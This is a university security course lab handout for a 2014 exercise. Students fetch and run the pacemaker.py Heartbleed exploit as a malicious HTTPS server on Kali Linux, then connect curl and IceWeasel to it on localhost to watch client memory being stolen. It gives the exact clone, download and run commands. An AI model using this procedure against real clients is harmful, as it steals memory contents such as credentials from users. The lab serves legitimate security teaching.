Proj 11: Attacking Clients with a Malicious Heartbleed SSL Server (10 pts.)

What You Need

Purpose

The heartbleed vulnerability in OpenSSL allows a malicous HTTPS server to steal RAM from a client machine that connects to it.

This was patched recently in openssl1.0.1g, but the Kali Linux machines you got on the DVD in class have an older, vulnerable version :)

Checking OpenSSL Version

To test the version, in a Terminal window, excute this command:
openssl version
The version number appears, as shown below. If the version is 1.0.1, 1.0.1f, or 1.0.1 followed by any letter before g, your server is likely to be vulnerable.

Kali Linux uses a vulnerable version!

Troubleshooting

If you have a later version of openssl, which is not vulnerable, re-extract a new Kali virtual machine from the DVDs handed out in class to get a vulnerable machine.

Get the pacemaker.py Exploit Code

In a Terminal window, execute these commands:
git clone https://github.com/Lekensteyn/pacemaker.git

cd pacemaker

ls

You should see a "pacemaker.py" file, as shown below.

Troubleshooting

If that git repository is unavailable for some reason, you can get a copy from my server with these commands:
wget http://samsclass.info/124/proj14/pacemaker.pyx

mv pacemaker.pyx pacemaker.py

Run the Malicious HTTPS Server

Resize your Terminal window to use only a portion of the Kali desktop, as shown below.

In the Terminal window, execute this command:

python pacemaker.py
Pacemaker starts listening, as shown below. Leave this window open.

Testing curl

Curl uses openssl, which makes it vulnerable.

Open a new Terminal window and resize it to use the other half of the Kali desktop, as shown below.

In the new Terminal window, execute this command:

curl https://localhost:4433/
Curl will show a connection error, but that doesn't matter because the RAM was stolen before that happened.

The pacemaker window fills with stolen RAM data, as shown below. The exploit worked!

In the pacemaker window, use the mouse to carefully scroll back up to see the start of the stolen RAM. Find the "Client returned 65517 (0xffed) bytes" message, as shown below. (Some versions of pacemaker show a slightly different number of bytes.)

Saving the Screen Image

Make sure your image has these required elements: Save the image with a filename of "Proj 11a from YOUR NAME".

Testing IceWeasel

In the pacemaker window, scroll to the bottom so you see the last line of stolen RAM, beginning with "ff00:".

At the top left of the Kali Linux desktop, click the round blue icon to open IceWeasel, which forked from Firefox.

Move IceWeasel to use only the lower portion of the desktop, as shown below.

In IceWeasel, type in this address and press Enter:

https://localhost:4433/
The pacemaker window shows one or messages saying "Not vulnerable!", as shown below.

This means IceWeasel is not vulnerable--that's just a normal heartbeat.

Saving the Screen Image

Make sure your image has these required elements: Save the image with a filename of "Proj 11b from YOUR NAME".

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 11 from YOUR NAME".


Sources

https://github.com/Lekensteyn/pacemaker


Last modified: 4-28-14 7:47 pm